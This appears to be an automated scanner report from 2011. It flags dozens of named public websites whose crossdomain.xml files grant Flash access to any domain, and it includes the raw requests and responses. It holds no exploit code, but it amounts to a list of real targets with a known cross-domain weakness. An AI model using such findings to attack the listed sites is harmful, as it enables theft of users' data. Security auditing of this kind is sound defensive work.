HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) PHP/5.3.2 Last-Modified: Wed, 23 Jun 2010 15:37:40 GMT ETag: "5db0a-102-489b4516c1900" Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Date: Sat, 02 Apr 2011 13:31:39 GMT Connection: close Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:39 GMT; path=/ Vary: User-Agent <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request-hea ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.sportsnetwork |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.sportsnetwork.com |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Cache-Control: max-age=60 Expires: Sat, 02 Apr 2011 13:44:06 GMT Date: Sat, 02 Apr 2011 13:43:06 GMT Content-Type: text/xml Accept-Ranges: bytes Last-Modified: Mon, 20 Jul 2009 16:18:35 GMT ETag: "d2a1a8bb559ca1:160a" Content-Length: 202 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-polic ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.swagbucks.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.swagbucks.com |
HTTP/1.1 200 OK Content-Length: 186 Content-Type: text/xml Last-Modified: Thu, 11 Jun 2009 18:44:34 GMT Accept-Ranges: bytes ETag: "48a15aac4eac91:4dd" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 13:52:55 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!--http://www.swagbucks <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.syfy.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.syfy.com |
HTTP/1.0 200 OK Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8b DAV/2 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.12.2 Last-Modified: Mon, 14 Sep 2009 16:36:06 GMT ETag: "9c9dd1-a3-4738c4325a980" Accept-Ranges: bytes Content-Length: 163 Content-Type: application/xml Cache-Control: max-age=300 Expires: Sat, 02 Apr 2011 14:11:19 GMT Date: Sat, 02 Apr 2011 14:06:19 GMT Connection: close Set-Cookie: ak-mobile-detected=no; expires=Sun, 03-Apr-2011 14:06:19 GMT; path=/ Vary: User-Agent <?xml version="1.0"?> <!-- !!!syfy!!! http://blog.scifi.com <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.tampabay.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tampabay.com |
HTTP/1.1 200 OK Server: nginx/0.7.65 Date: Sat, 02 Apr 2011 13:39:21 GMT Content-Type: text/xml Connection: close Cache-control: public,private Last-modified: Mon, 23 Jun 2008 21:00:46 GMT Etag: "52-48600efe" X-Cacheable: YES Content-Length: 82 X-Varnish: 380322934 380303585 Age: 283 Via: 1.1 varnish X-Served-By: varnish-a X-Cache: HIT X-Cache-Hits: 2 X-Cache-Backend: default <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.tastebook.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.tastebook.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:09:10 GMT Server: Apache Last-Modified: Mon, 07 Mar 2011 22:16:25 GMT Accept-Ranges: bytes Content-Length: 146 Cache-Control: max-age=300 Expires: Sat, 02 Apr 2011 14:14:10 GMT Vary: Accept-Encoding P3P: policyref="http://www Connection: close Content-Type: application/xml <?xml version="1.0"?> <!-- http://www.foo.com <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.teennick.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.teennick.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) mod_jk/1.2.27 ETag: W/"2563-1301085024000" Last-Modified: Fri, 25 Mar 2011 20:30:24 GMT Content-Length: 2563 Content-Type: text/xml Cache-Control: max-age=600 Date: Sat, 02 Apr 2011 14:18:01 GMT Connection: close Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 20:18:01 GMT; path=/ Vary: User-Agent <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.mtvi.com"/> <allow-access-from domain="*.nick.com"/> <allow-access-from domain="*.nickjr.com"/> <allow-access-from domain="*.nickjr-d.mtvi.com"/> <allow-access-from domain="*.nickjr-q.mtvi.com"/> <allow-access-from domain="*.nickonline.com"/> <allow-access-from domain="*.kids.nickonline.com"/> <allow-access-from domain="*.addictinggames.com"/> <allow-access-from domain="*.shockwave.com"/> <allow-access-from domain="*.nickatnite.com"/> <allow-access-from domain="*.nickatnight.com"/> <allow-access-from domain="*.magorium.com"/> <allow-access-from domain="*.doubleclick*"/> <allow-access-from domain="*.the-n.com"/> <allow-access-from domain="*.theredspace.com"/> <allow-access-from domain="24.222.18.26"/> <allow-access-from domain="*.nicktoonsnetwork.com"/> <allow-access-from domain="*.mtvnservices.com"/> <allow-access-from domain="*.biggreenhelp.com"/> <allow-access-from domain="*.nick.co.kr"/> <allow-access-from domain="*.nicktv.it"/> <allow-access-from domain="*.popsicle.com"/> <allow-access-from domain="*.mtv.pl"/> <allow-access-from domain="96.10.20.67"/> <allow-access-from domain="*.mua.nick-d.mtvi.com"/> <allow-access-from domain="*.mua.nick-q.mtvi.com"/> <allow-access-from domain="*.mua.nick.com"/> <allow-access-from domain="kca.gigya.s3.amazonaws <allow-access-from domain="http://testing.arkadium ...[SNIP]... <allow-access-from domain="*.neopets.com"/> <allow-access-from domain="gamestudio.sarbakangames <allow-access-from domain="*.scenic-d.mtvi.com/"/> <allow-access-from domain="*.scenic-q.mtvi.com/"/> <allow-access-from domain="*.scenic-l.mtvi.com/"/> <allow-access-from domain="live.toptrumps.com"/> <allow-access-from domain="*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.dartmotif.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.com" secure="true"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.2mdn.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.dartmotif.net" secure="true"/> ...[SNIP]... <allow-access-from domain="*.gstatic.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.terra.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.terra.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:19:43 GMT Server: Apache Set-Cookie: WEBTRENDS_ID=173.193.214 Last-Modified: Fri, 11 Jan 2008 15:27:05 GMT ETag: "17bb6-91-44373f5718440" Accept-Ranges: bytes Content-Length: 145 Vary: Accept-Encoding,User Connection: close Content-Type: application/xml <?xml version="1.0"?> <!-- http://www.terra.com <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thedailybeast |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.thedailybeast.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Wed, 16 Mar 2011 22:58:12 GMT ETag: "809660-112-7aae2900" Content-Type: text/xml Date: Sat, 02 Apr 2011 13:40:10 GMT Content-Length: 274 Connection: close <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain-p ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thedailyshow |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.thedailyshow.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) PHP/5.3.1 Last-Modified: Mon, 09 Mar 2009 23:15:41 GMT ETag: "20520-102-464b7d0294140" Accept-Ranges: bytes Content-Length: 258 Content-Type: application/xml Cache-Control: max-age=971 Expires: Sat, 02 Apr 2011 13:47:58 GMT Date: Sat, 02 Apr 2011 13:31:47 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> <allow-http-request-hea ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.theonion.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.theonion.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:40:14 GMT Server: PWS/1.7.1.5 X-Px: ht-d brf iad-agg-n33.panthercdn ETag: "122ed-cc-4819d1d3984c0" Cache-Control: max-age=604800 Expires: Sun, 03 Apr 2011 13:09:36 GMT Age: 520238 Content-Length: 204 Content-Type: application/xml Last-Modified: Fri, 12 Mar 2010 16:35:07 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.thisoldhouse |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.thisoldhouse.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:13:08 GMT Server: Apache Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT ETag: "373-cdb58f40" Accept-Ranges: bytes Content-Length: 883 Content-Type: application/xml Vary: Accept-Encoding,X-Catmap P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR' Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> <allow-access-from domain="img2.timeinc.net"/> <allow-access-from domain="img2-short.timeinc.net"/> <allow-access-from domain="*.aol.com"/> <allow-access-from domain="*.digitalcity.com"/> <allow-access-from domain="*.aolcdn.com"/> <allow-access-from domain="*.channel.aol.com"/> <allow-access-from domain="*.aimtoday.com"/> <allow-access-from domain="*.aimtoday.aim.com"/> <allow-access-from domain="*.dashboard.aim.com"/> <allow-access-from domain="*.aim.com"/> <allow-access-from domain="peopleconnection.aol.com"/> <allow-access-from domain="*.peoplecmg.com"/> <allow-access-from domain="*.myspacecdn.com"/> <allow-access-from domain="*.taaz.com" secure="true"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.time.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.time.com |
HTTP/1.1 200 OK Server: Undisclosed-Webserver/0.1 Date: Sat, 02 Apr 2011 13:24:06 GMT P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR' Last-modified: Sat, 02 Apr 2011 13:24:06 GMT Content-type: text/xml Set-Cookie: PFUID=40ec37ca4d9723 Last-modified: Thu, 22 Jul 2010 20:05:55 GMT Content-length: 218 Accept-ranges: bytes Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false"/> </cro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.totalbeauty |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.totalbeauty.com |
HTTP/1.0 200 OK Date: Fri, 01 Apr 2011 19:18:23 GMT Last-Modified: Tue, 22 Mar 2011 01:23:28 GMT Accept-Ranges: bytes Content-Length: 281 Content-Type: application/xml _onnection: keep-alive Via: CN-5000 Set-Cookie: cresist=43C93BCA00001F90; path=/ Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.travelpod.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.travelpod.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 14:10:10 GMT Server: Apache Last-Modified: Tue, 10 Aug 2010 14:12:56 GMT ETag: "145-48d78bac66a00" Accept-Ranges: bytes Content-Length: 325 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.urbanspoon.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.urbanspoon.com |
HTTP/1.1 200 OK Server: nginx/0.6.32 Date: Sat, 02 Apr 2011 13:44:45 GMT Content-Type: text/xml Content-Length: 217 Last-Modified: Sun, 21 Dec 2008 22:23:18 GMT Connection: close Expires: Sat, 02 Apr 2011 14:14:45 GMT Cache-Control: max-age=1800 Accept-Ranges: bytes ...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ustream.tv |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.ustream.tv |
HTTP/1.0 200 OK Server: Apache Pragma: no-cache X-RSRC: w24 Content-Type: application/xml; charset=UTF-8 Cache-Control: public, max-age=851 Expires: Sat, 02 Apr 2011 13:49:44 GMT Date: Sat, 02 Apr 2011 13:35:33 GMT Content-Length: 142 Connection: close <cross-domain-policy> <allow-access-from domain="*" /> <site-control permitted-cross-domain </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.vh1.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.vh1.com |
HTTP/1.0 200 OK Server: Apache/2.0.63 (Unix) mod_jk/1.2.27 Last-Modified: Wed, 22 Oct 2008 15:54:17 GMT ETag: "13a9b68-387-459d98f Accept-Ranges: bytes Content-Length: 903 Content-Type: application/xml Cache-Control: max-age=600 Date: Sat, 02 Apr 2011 13:52:31 GMT Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.vh1.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.mtvi.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.schematic.com" secure="true" /> ...[SNIP]... <allow-access-from domain="*.traab.com" /> <allow-access-from domain="*.bigfishgames.com" /> <allow-access-from domain="*.gottempo.com" /> <allow-access-from domain="*.vh1classic.com" /> <allow-access-from domain="*.mtvnservices.com" /> <allow-access-from domain="widgets.flux.com"/> <allow-access-from domain="*.flux.com"/> <allow-access-from domain="*.flux-staging.com"/> <allow-access-from domain="*.scandalist.com"/> <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.videosurf.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.videosurf.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:39:16 GMT Server: Apache/2.2.16 (Ubuntu) Last-Modified: Thu, 31 Mar 2011 08:10:38 GMT Accept-Ranges: bytes Content-Length: 215 Vary: Accept-Encoding Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" secure="false" /> </cross ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.weather.gov |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.weather.gov |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:32:09 GMT Server: Apache Last-Modified: Thu, 17 Jun 2010 12:56:26 GMT Accept-Ranges: bytes Content-Length: 167 Cache-Control: max-age=900 Expires: Sat, 02 Apr 2011 13:47:09 GMT Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.weatherbug.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.weatherbug.com |
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 PICS-Label: (PICS-1.0 "http://www.rsac.org P3P: CP="NOI DSP COR NID TAI STP UNI" X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 12:44:05 GMT Content-Type: text/xml Accept-Ranges: bytes Last-Modified: Tue, 12 Oct 2004 19:41:36 GMT ETag: "4a25787c93b0c41:811" Content-Length: 208 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.webkinz.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.webkinz.com |
HTTP/1.0 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Tue, 29 Mar 2011 20:40:26 GMT ETag: "588614-117-49fa511ece280 Accept-Ranges: bytes Content-Length: 279 _onnection: close Content-Type: text/xml Date: Sat, 02 Apr 2011 13:51:11 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" to-ports="*" secure="false" /> <allow-http-request-he ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.webmd.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.webmd.com |
HTTP/1.1 200 OK Content-Length: 207 Content-Type: text/xml Content-Location: http://www.webmd.com Last-Modified: Tue, 19 Aug 2008 19:19:28 GMT Accept-Ranges: bytes ETag: "060a57f302c91:d8b" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 12:38:03 GMT Connection: keep-alive <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wix.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wix.com |
HTTP/1.0 200 OK X-Via-Node: sputnik5 Date: Sat, 02 Apr 2011 13:42:08 GMT Server: Apache Last-Modified: Thu, 01 Jul 2010 13:00:25 GMT ETag: "49ac155-153-48a530d Accept-Ranges: bytes Content-Length: 339 Cache-Control: max-age=86400 Expires: Sun, 03 Apr 2011 13:42:08 GMT Content-Type: application/xml Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" secure="true"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wowhead.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wowhead.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:33:27 GMT Server: Apache Last-Modified: Tue, 20 Jul 2010 16:55:56 GMT ETag: "42e583-c8-48bd48f0a7f00" Accept-Ranges: bytes Content-Length: 200 Cache-Control: max-age=604800 Expires: Sat, 09 Apr 2011 13:33:27 GMT Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.wunderground |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.wunderground.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 12:44:12 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 Last-Modified: Thu, 02 Dec 2010 17:47:34 GMT Accept-Ranges: bytes Content-Length: 201 Connection: close Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.xanga.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.xanga.com |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/xml Last-Modified: Tue, 12 Oct 2010 20:58:52 GMT Accept-Ranges: bytes ETag: "131c7b46506acb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:06:31 GMT Connection: close Content-Length: 282 ...<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-http-request ...[SNIP]... <allow-access-from domain="*" to-ports="80"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.yardbarker.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.yardbarker.com |
HTTP/1.1 200 OK Server: nginx/0.8.35 Date: Sat, 02 Apr 2011 13:37:45 GMT Content-Type: text/xml Content-Length: 199 Last-Modified: Thu, 16 Jul 2009 00:25:33 GMT Connection: close Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.yfrog.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.yfrog.com |
HTTP/1.1 200 OK Server: nginx/0.8.37 Date: Sat, 02 Apr 2011 13:27:19 GMT Content-Type: text/xml Connection: close Content-Length: 1198 Last-Modified: Thu, 15 Jul 2010 21:31:01 GMT Accept-Ranges: bytes <?xml version="1.0" ?> <cross-domain-policy> <allow-access-from domain="*" /> <allow-http-request <allow-http-requ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.younghollywood |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.younghollywood.com |
HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) Last-Modified: Wed, 16 Mar 2011 20:59:59 GMT ETag: "34003ca-914-49e9fd3 Cache-Control: max-age=259200 Expires: Tue, 05 Apr 2011 13:42:08 GMT Content-Type: application/xml Content-Length: 2324 X-Varnish-IP: 192.168.100.142 Date: Sat, 02 Apr 2011 13:42:08 GMT X-Varnish: 2005739098 Age: 0 Via: 1.1 varnish Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" to-ports="*"/> <allow-access-from domain="*.brightcove.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.amgdgt.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.tubemogul.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.adtechus.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.llnwd.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.tremormedia.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.scanscout.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.fbcdn.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.hulu.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.google.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.googleadservices.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.typepad.com"/> <allow-access-from domain="*.google-analytics.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.yieldmanager.com"/> <allow-access-from domain="*.scanscout.com" secure="false"/> ...[SNIP]... <allow-access-from domain="brightcove.vo.llnwd.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.admeld.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.redcated" secure="false"/> ...[SNIP]... <allow-access-from domain="*.media6degrees.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.serving-sys.com"/> <allow-access-from domain="*.videoegg.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.quantserve.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.adobe.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.macromedia.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.doubleclick.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.collective-media.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.admeld.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.facebook.com" secure="false"/> ...[SNIP]... <allow-access-from domain="*.facebook.net" secure="false"/> ...[SNIP]... <allow-access-from domain="*.twitter.com" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.yourfilehost |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.yourfilehost.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:02:01 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 14 May 2010 18:06:54 GMT ETag: "578851f-cd-bd784b80" Accept-Ranges: bytes Content-Length: 205 Vary: Accept-Encoding Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-poli ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zillow.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zillow.com |
HTTP/1.1 200 OK Date: Sat, 02 Apr 2011 13:36:35 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat Cache-Control: max-age=1209600 Expires: Sat, 16 Apr 2011 13:36:35 GMT ETag: W/"294-1246488758000" Last-Modified: Wed, 01 Jul 2009 22:52:38 GMT Content-Type: text/xml Content-Length: 294 Set-Cookie: BIGipServertomcat_pool_0 Via: 1.0 www.zillow.com Vary: User-Agent,Accept Keep-Alive: timeout=2, max=71 Connection: close Set-Cookie: BIGipServerapache_pool_0 <?xml version="1.0" encoding="utf-8" ?> <!-- http://www.foo.com <cross-domain-policy> <site-control permitted-cross-domain <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zoosnet.net |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zoosnet.net |
HTTP/1.1 200 OK Content-Length: 102 Content-Type: text/xml Last-Modified: Thu, 15 May 2008 07:10:06 GMT Accept-Ranges: bytes ETag: "c669fab35ab6c81:a93" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sat, 02 Apr 2011 14:00:59 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.zvents.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.zvents.com |
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sat, 02 Apr 2011 13:43:43 GMT Content-Type: text/xml Content-Length: 201 Last-Modified: Wed, 13 Feb 2008 03:19:32 GMT Connection: keep-alive Expires: Sun, 03 Apr 2011 13:43:43 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sat, 02 Apr 2011 11:33:56 GMT Expires: Sun, 03 Apr 2011 11:33:56 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 4215 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from 